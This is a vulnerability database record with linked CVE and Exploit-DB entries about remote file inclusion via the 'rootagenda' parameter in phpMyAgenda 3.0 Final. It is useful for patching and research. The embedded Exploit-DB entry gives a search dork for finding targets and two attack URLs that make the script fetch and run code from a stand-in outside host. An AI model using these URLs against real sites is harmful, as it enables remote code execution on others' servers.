ID OSVDB:29150 Type osvdb Reporter Aesthetico(admin@majorsecurity.de) Modified 2006-04-24T12:32:35
Description
Vulnerability Description
phpMyAgenda contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to infoevent.php3 not properly sanitizing user input supplied to the 'rootagenda' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
Technical Description
This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
Solution Description
Upgrade to version 3.1 beta 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
phpMyAgenda contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to infoevent.php3 not properly sanitizing user input supplied to the 'rootagenda' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
References:
Vendor URL: http://phpmyagenda.com/
Vendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?forum_id=569237
Security Tracker: 1015984
Secunia Advisory ID:19748Related OSVDB ID: 29149Related OSVDB ID: 29151Related OSVDB ID: 24943Related OSVDB ID: 29148
Other Advisory URL: http://osvdb.org/ref/29/2914x-phpmyagenda.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0503.html
ISS X-Force ID: 26062
Generic Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/phpMyAgenda_fi.txt
FrSIRT Advisory: ADV-2006-1509
CVE-2006-5132
Bugtraq ID: 17670
{"edition": 1, "title": "phpMyAgenda infoevent.php3 rootagenda Variable Remote File Inclusion", "bulletinFamily": "software", "published": "2006-04-24T12:32:35", "lastseen": "2017-04-28T13:20:25", "modified": "2006-04-24T12:32:35", "reporter": "Aesthetico(admin@majorsecurity.de)", "viewCount": 1, "href": "https://vulners.com/osvdb/OSVDB:29150", "description": "## Vulnerability Description\nphpMyAgenda contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to infoevent.php3 not properly sanitizing user input supplied to the 'rootagenda' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 3.1 beta 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nphpMyAgenda contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to infoevent.php3 not properly sanitizing user input supplied to the 'rootagenda' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## References:\nVendor URL: http://phpmyagenda.com/\nVendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?forum_id=569237\nSecurity Tracker: 1015984\n[Secunia Advisory ID:19748](https://secuniaresearch.flexerasoftware.com/advisories/19748/)\n[Related OSVDB ID: 29149](https://vulners.com/osvdb/OSVDB:29149)\n[Related OSVDB ID: 29151](https://vulners.com/osvdb/OSVDB:29151)\n[Related OSVDB ID: 24943](https://vulners.com/osvdb/OSVDB:24943)\n[Related OSVDB ID: 29148](https://vulners.com/osvdb/OSVDB:29148)\nOther Advisory URL: http://osvdb.org/ref/29/2914x-phpmyagenda.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0503.html\nISS X-Force ID: 26062\nGeneric Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/phpMyAgenda_fi.txt\nFrSIRT Advisory: ADV-2006-1509\n[CVE-2006-5132](https://vulners.com/cve/CVE-2006-5132)\nBugtraq ID: 17670\n", "affectedSoftware": [{"name": "phpMyAgenda", "version": "3.0 Final", "operator": "eq"}], "type": "osvdb", "references": [], "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2017-04-28T13:20:25", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5132"]}, {"type": "exploitdb", "idList": ["EDB-ID:1731"]}, {"type": "osvdb", "idList": ["OSVDB:29151", "OSVDB:29149", "OSVDB:29148"]}], "modified": "2017-04-28T13:20:25", "rev": 2}, "vulnersScore": 6.8}, "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "cvelist": ["CVE-2006-5132"], "id": "OSVDB:29150"}
{"cve": [{"lastseen": "2020-12-09T19:23:48", "description": "Multiple PHP remote file inclusion vulnerabilities in phpMyAgenda 3.0 Final and earlier allow remote attackers to execute arbitrary PHP code via a URL in the rootagenda parameter to (1) agendaplace.php3, (2) agendaplace2.php3, (3) infoevent.php3, and (4) agenda2.php3, different vectors than CVE-2006-2009.", "edition": 5, "cvss3": {}, "published": "2006-10-03T04:03:00", "title": "CVE-2006-5132", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5132"], "modified": "2017-07-20T01:33:00", "cpe": ["cpe:/a:phpmyagenda:phpmyagenda:3.0_final"], "id": "CVE-2006-5132", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5132", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpmyagenda:phpmyagenda:3.0_final:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-5132"], "edition": 1, "description": "## Vulnerability Description\nphpMyAgenda contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to agendaplace2.php3 not properly sanitizing user input supplied to the 'rootagenda' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 3.1 beta 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nphpMyAgenda contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to agendaplace2.php3 not properly sanitizing user input supplied to the 'rootagenda' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## References:\nVendor URL: http://phpmyagenda.com/\nVendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?forum_id=569237\nSecurity Tracker: 1015984\n[Secunia Advisory ID:19748](https://secuniaresearch.flexerasoftware.com/advisories/19748/)\n[Related OSVDB ID: 29150](https://vulners.com/osvdb/OSVDB:29150)\n[Related OSVDB ID: 29151](https://vulners.com/osvdb/OSVDB:29151)\n[Related OSVDB ID: 24943](https://vulners.com/osvdb/OSVDB:24943)\n[Related OSVDB ID: 29148](https://vulners.com/osvdb/OSVDB:29148)\nOther Advisory URL: http://osvdb.org/ref/29/2914x-phpmyagenda.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0503.html\nISS X-Force ID: 26062\nGeneric Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/phpMyAgenda_fi.txt\nFrSIRT Advisory: ADV-2006-1509\n[CVE-2006-5132](https://vulners.com/cve/CVE-2006-5132)\nBugtraq ID: 17670\n", "modified": "2006-04-24T12:32:35", "published": "2006-04-24T12:32:35", "href": "https://vulners.com/osvdb/OSVDB:29149", "id": "OSVDB:29149", "title": "phpMyAgenda agendaplace2.php3 rootagenda Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-5132"], "edition": 1, "description": "## Vulnerability Description\nphpMyAgenda contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to agendaplace.php3 not properly sanitizing user input supplied to the 'rootagenda' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 3.1 beta 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nphpMyAgenda contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to agendaplace.php3 not properly sanitizing user input supplied to the 'rootagenda' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## References:\nVendor URL: http://phpmyagenda.com/\nVendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?forum_id=569237\nSecurity Tracker: 1015984\n[Secunia Advisory ID:19748](https://secuniaresearch.flexerasoftware.com/advisories/19748/)\n[Related OSVDB ID: 29150](https://vulners.com/osvdb/OSVDB:29150)\n[Related OSVDB ID: 29149](https://vulners.com/osvdb/OSVDB:29149)\n[Related OSVDB ID: 29151](https://vulners.com/osvdb/OSVDB:29151)\n[Related OSVDB ID: 24943](https://vulners.com/osvdb/OSVDB:24943)\nOther Advisory URL: http://osvdb.org/ref/29/2914x-phpmyagenda.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0503.html\nISS X-Force ID: 26062\nGeneric Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/phpMyAgenda_fi.txt\nFrSIRT Advisory: ADV-2006-1509\n[CVE-2006-5132](https://vulners.com/cve/CVE-2006-5132)\nBugtraq ID: 17670\n", "modified": "2006-04-24T12:32:35", "published": "2006-04-24T12:32:35", "href": "https://vulners.com/osvdb/OSVDB:29148", "id": "OSVDB:29148", "title": "phpMyAgenda agendaplace.php3 rootagenda Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "cvelist": ["CVE-2006-5132"], "edition": 1, "description": "## Vulnerability Description\nphpMyAgenda contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to agenda2.php3 not properly sanitizing user input supplied to the 'rootagenda' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 3.1 beta 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nphpMyAgenda contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to agenda2.php3 not properly sanitizing user input supplied to the 'rootagenda' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## References:\nVendor URL: http://phpmyagenda.com/\nVendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?forum_id=569237\nSecurity Tracker: 1015984\n[Secunia Advisory ID:19748](https://secuniaresearch.flexerasoftware.com/advisories/19748/)\n[Related OSVDB ID: 29150](https://vulners.com/osvdb/OSVDB:29150)\n[Related OSVDB ID: 29153](https://vulners.com/osvdb/OSVDB:29153)\n[Related OSVDB ID: 29149](https://vulners.com/osvdb/OSVDB:29149)\n[Related OSVDB ID: 24943](https://vulners.com/osvdb/OSVDB:24943)\n[Related OSVDB ID: 29148](https://vulners.com/osvdb/OSVDB:29148)\nOther Advisory URL: http://osvdb.org/ref/29/2914x-phpmyagenda.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0503.html\nISS X-Force ID: 26062\nGeneric Exploit URL: http://downloads.securityfocus.com/vulnerabilities/exploits/phpMyAgenda_fi.txt\nFrSIRT Advisory: ADV-2006-1509\n[CVE-2006-5132](https://vulners.com/cve/CVE-2006-5132)\nBugtraq ID: 17670\n", "modified": "2006-04-24T12:32:35", "published": "2006-04-24T12:32:35", "href": "https://vulners.com/osvdb/OSVDB:29151", "id": "OSVDB:29151", "title": "phpMyAgenda agenda2.php3 rootagenda Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:46:51", "description": "phpMyAgenda <= 3.0 Final (rootagenda) Remote Include Vulnerability. CVE-2006-5132. Webapps exploit for php platform", "published": "2006-04-30T00:00:00", "type": "exploitdb", "title": "phpMyAgenda <= 3.0 Final rootagenda Remote Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5132"], "modified": "2006-04-30T00:00:00", "id": "EDB-ID:1731", "href": "https://www.exploit-db.com/exploits/1731/", "sourceData": "Title: phpMyAgenda <=3.0 Final - Remote File Include Vulnerability\n-----------------------------------------------------------------\nVendor: phpMyAgenda\nURL: http://phpmyagenda.com\n-----------------------------------------------------------------\n\nCredits:\nDiscovered by: 'Aesthetico'\nhttp://www.majorsecurity.de\n-----------------------------------------------------------------\nSearch for: \"Powered by phpMyAgenda\"\n-----------------------------------------------------------------\n\nExploitation:\n\n/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?\n/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?\n\n# milw0rm.com [2006-04-30]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1731/"}]}